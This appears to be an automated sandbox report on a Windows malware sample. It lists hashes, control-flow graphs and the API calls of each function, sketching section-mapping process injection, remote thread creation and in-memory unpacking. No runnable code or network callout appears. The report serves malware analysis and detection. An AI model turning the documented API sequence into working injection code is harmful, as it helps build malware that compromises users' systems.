                                                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.7%
                                                                                                        Dynamic/Decrypted Code Coverage:40.7%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:118
                                                                                                        Total number of Limit Nodes:4
                                                                                                        execution_graph 3252 402e40 3254 402e37 3252->3254 3255 402edf 3254->3255 3256 4018e6 3254->3256 3257 4018f5 3256->3257 3258 40192e Sleep 3257->3258 3259 401949 3258->3259 3261 40195a 3259->3261 3262 401514 3259->3262 3261->3255 3264 401524 3262->3264 3263 4016e0 3263->3261 3264->3263 3265 4015c4 NtDuplicateObject 3264->3265 3265->3263 3266 4015e1 NtCreateSection 3265->3266 3267 401661 NtCreateSection 3266->3267 3268 401607 NtMapViewOfSection 3266->3268 3267->3263 3269 40168d 3267->3269 3268->3267 3270 40162a NtMapViewOfSection 3268->3270 3269->3263 3271 401697 NtMapViewOfSection 3269->3271 3270->3267 3272 401648 3270->3272 3271->3263 3273 4016be NtMapViewOfSection 3271->3273 3272->3267 3273->3263 3369 401542 3370 40153b 3369->3370 3371 4015c4 NtDuplicateObject 3370->3371 3377 4016e0 3370->3377 3372 4015e1 NtCreateSection 3371->3372 3371->3377 3373 401661 NtCreateSection 3372->3373 3374 401607 NtMapViewOfSection 3372->3374 3375 40168d 3373->3375 3373->3377 3374->3373 3376 40162a NtMapViewOfSection 3374->3376 3375->3377 3378 401697 NtMapViewOfSection 3375->3378 3376->3373 3379 401648 3376->3379 3378->3377 3380 4016be NtMapViewOfSection 3378->3380 3379->3373 3380->3377 3278 7512bc 3279 7512cb 3278->3279 3282 751a5c 3279->3282 3284 751a77 3282->3284 3283 751a80 CreateToolhelp32Snapshot 3283->3284 3285 751a9c Module32First 3283->3285 3284->3283 3284->3285 3286 751aab 3285->3286 3288 7512d4 3285->3288 3289 75171b 3286->3289 3290 751746 3289->3290 3291 751757 VirtualAlloc 3290->3291 3292 75178f 3290->3292 3291->3292 3292->3292 3293 52003c 3294 520049 3293->3294 3306 520e0f SetErrorMode SetErrorMode 3294->3306 3299 520265 3300 5202ce VirtualProtect 3299->3300 3302 52030b 3300->3302 3301 520439 VirtualFree 3305 5204be LoadLibraryA 3301->3305 3302->3301 3304 5208c7 3305->3304 3307 520223 3306->3307 3308 520d90 3307->3308 3309 520dad 3308->3309 3310 520dbb GetPEB 3309->3310 3311 520238 VirtualAlloc 3309->3311 3310->3311 3311->3299 3428 402dd0 3429 402ddc 3428->3429 3430 4018e6 8 API calls 3429->3430 3431 402edf 3429->3431 3430->3431 3350 4018f1 3351 4018f6 3350->3351 3352 40192e Sleep 3351->3352 3353 401949 3352->3353 3354 401514 7 API calls 3353->3354 3355 40195a 3353->3355 3354->3355 3312 520001 3313 520005 3312->3313 3318 52092b GetPEB 3313->3318 3315 520030 3320 52003c 3315->3320 3319 520972 3318->3319 3319->3315 3321 520049 3320->3321 3322 520e0f 2 API calls 3321->3322 3323 520223 3322->3323 3324 520d90 GetPEB 3323->3324 3325 520238 VirtualAlloc 3324->3325 3326 520265 3325->3326 3327 5202ce VirtualProtect 3326->3327 3329 52030b 3327->3329 3328 520439 VirtualFree 3332 5204be LoadLibraryA 3328->3332 3329->3328 3331 5208c7 3332->3331 3415 401915 3416 40191a 3415->3416 3417 4018c6 3415->3417 3418 40192e Sleep 3416->3418 3419 401949 3418->3419 3420 401514 7 API calls 3419->3420 3421 40195a 3419->3421 3420->3421 3274 402f97 3275 4030ee 3274->3275 3276 402fc1 3274->3276 3276->3275 3277 40307c RtlCreateUserThread NtTerminateProcess 3276->3277 3277->3275 3333 520005 3334 52092b GetPEB 3333->3334 3335 520030 3334->3335 3336 52003c 7 API calls 3335->3336 3337 520038 3336->3337 3405 402d7b 3407 402d38 3405->3407 3406 4018e6 8 API calls 3408 402dc7 3406->3408 3407->3405 3407->3406 3407->3408 3356 4014fe 3357 401506 3356->3357 3358 401531 3356->3358 3359 4015c4 NtDuplicateObject 3358->3359 3365 4016e0 3358->3365 3360 4015e1 NtCreateSection 3359->3360 3359->3365 3361 401661 NtCreateSection 3360->3361 3362 401607 NtMapViewOfSection 3360->3362 3363 40168d 3361->3363 3361->3365 3362->3361 3364 40162a NtMapViewOfSection 3362->3364 3363->3365 3366 401697 NtMapViewOfSection 3363->3366 3364->3361 3368 401648 3364->3368 3366->3365 3367 4016be NtMapViewOfSection 3366->3367 3367->3365 3368->3361

                                                                                                        Executed Functions

                                                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 111->112 114->106 116 4015e1-401605 NtCreateSection 114->116 119 401661-401687 NtCreateSection 116->119 120 401607-401628 NtMapViewOfSection 116->120 119->106 121 40168d-401691 119->121 120->119 122 40162a-401646 NtMapViewOfSection 120->122 121->106 125 401697-4016b8 NtMapViewOfSection 121->125 122->119 126 401648-40165e 122->126 125->106 128 4016be-4016da NtMapViewOfSection 125->128 126->119 128->106 129 4016e0 call 4016e5 128->129
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 158->159 161->153 163 4015e1-401605 NtCreateSection 161->163 166 401661-401687 NtCreateSection 163->166 167 401607-401628 NtMapViewOfSection 163->167 166->153 168 40168d-401691 166->168 167->166 169 40162a-401646 NtMapViewOfSection 167->169 168->153 172 401697-4016b8 NtMapViewOfSection 168->172 169->166 173 401648-40165e 169->173 172->153 175 4016be-4016da NtMapViewOfSection 172->175 173->166 175->153 176 4016e0 call 4016e5 175->176
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 202->203 205->197 207 4015e1-401605 NtCreateSection 205->207 210 401661-401687 NtCreateSection 207->210 211 401607-401628 NtMapViewOfSection 207->211 210->197 212 40168d-401691 210->212 211->210 213 40162a-401646 NtMapViewOfSection 211->213 212->197 216 401697-4016b8 NtMapViewOfSection 212->216 213->210 217 401648-40165e 213->217 216->197 219 4016be-4016da NtMapViewOfSection 216->219 217->210 219->197 220 4016e0 call 4016e5 219->220
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 241->242 244->236 246 4015e1-401605 NtCreateSection 244->246 249 401661-401687 NtCreateSection 246->249 250 401607-401628 NtMapViewOfSection 246->250 249->236 251 40168d-401691 249->251 250->249 252 40162a-401646 NtMapViewOfSection 250->252 251->236 255 401697-4016b8 NtMapViewOfSection 251->255 252->249 256 401648-40165e 252->256 255->236 258 4016be-4016da NtMapViewOfSection 255->258 256->249 258->236 259 4016e0 call 4016e5 258->259
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 281->282 284->276 286 4015e1-401605 NtCreateSection 284->286 289 401661-401687 NtCreateSection 286->289 290 401607-401628 NtMapViewOfSection 286->290 289->276 291 40168d-401691 289->291 290->289 292 40162a-401646 NtMapViewOfSection 290->292 291->276 295 401697-4016b8 NtMapViewOfSection 291->295 292->289 296 401648-40165e 292->296 295->276 298 4016be-4016da NtMapViewOfSection 295->298 296->289 298->276 299 4016e0 call 4016e5 298->299
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 316 40306c 313->316 314->306 315 403070-403075 314->315 315->304 317 403077-40307a 315->317 316->315 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                                                        Function 0052003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 52003c-520047 1 520049 0->1 2 52004c-520263 call 520a3f call 520e0f call 520d90 VirtualAlloc 0->2 1->2 17 520265-520289 call 520a69 2->17 18 52028b-520292 2->18 22 5202ce-5203c2 VirtualProtect call 520cce call 520ce7 17->22 20 5202a1-5202b0 18->20 21 5202b2-5202cc 20->21 20->22 21->20 29 5203d1-5203e0 22->29 30 5203e2-520437 call 520ce7 29->30 31 520439-5204b8 VirtualFree 29->31 30->29 33 5205f4-5205fe 31->33 34 5204be-5204cd 31->34 35 520604-52060d 33->35 36 52077f-520789 33->36 38 5204d3-5204dd 34->38 35->36 41 520613-520637 35->41 39 5207a6-5207b0 36->39 40 52078b-5207a3 36->40 38->33 43 5204e3-520505 38->43 44 5207b6-5207cb 39->44 45 52086e-5208be LoadLibraryA 39->45 40->39 46 52063e-520648 41->46 51 520517-520520 43->51 52 520507-520515 43->52 48 5207d2-5207d5 44->48 50 5208c7-5208f9 45->50 46->36 49 52064e-52065a 46->49 53 5207d7-5207e0 48->53 54 520824-520833 48->54 49->36 55 520660-52066a 49->55 56 520902-52091d 50->56 57 5208fb-520901 50->57 58 520526-520547 51->58 52->58 59 5207e2 53->59 60 5207e4-520822 53->60 62 520839-52083c 54->62 61 52067a-520689 55->61 57->56 63 52054d-520550 58->63 59->54 60->48 64 520750-52077a 61->64 65 52068f-5206b2 61->65 62->45 66 52083e-520847 62->66 68 5205e0-5205ef 63->68 69 520556-52056b 63->69 64->46 70 5206b4-5206ed 65->70 71 5206ef-5206fc 65->71 72 52084b-52086c 66->72 73 520849 66->73 68->38 74 52056f-52057a 69->74 75 52056d 69->75 70->71 76 52074b 71->76 77 5206fe-520748 71->77 72->62 73->45 78 52059b-5205bb 74->78 79 52057c-520599 74->79 75->68 76->61 77->76 84 5205bd-5205db 78->84 79->84 84->63
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_520000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14
                                                                                                        Function 00751A5C Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 319 751a5c-751a75 320 751a77-751a79 319->320 321 751a80-751a8c CreateToolhelp32Snapshot 320->321 322 751a7b 320->322 323 751a9c-751aa9 Module32First 321->323 324 751a8e-751a94 321->324 322->321 325 751ab2-751aba 323->325 326 751aab-751aac call 75171b 323->326 324->323 329 751a96-751a9a 324->329 330 751ab1 326->330 329->320 329->323 330->325
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00751A84
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00751AA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073F000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_73f000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: eccb8381676b8ad2ae4a61135c2e81e4ac5420b3e3646cb90258bdee9a9e184c
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 9FF0F6351017116BE7213BF89C8CBEE72E8AF49723F504629EA42924C0DBB4EC494660
                                                                                                        Function 00520E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 332 520e0f-520e24 SetErrorMode * 2 333 520e26 332->333 334 520e2b-520e2c 332->334 333->334
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_520000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: a764e639832798b8d740d17924903a9f0c649362d611a0acc80e9a5e0a88a39a
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: 75D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DD90C1C770994046E5
                                                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
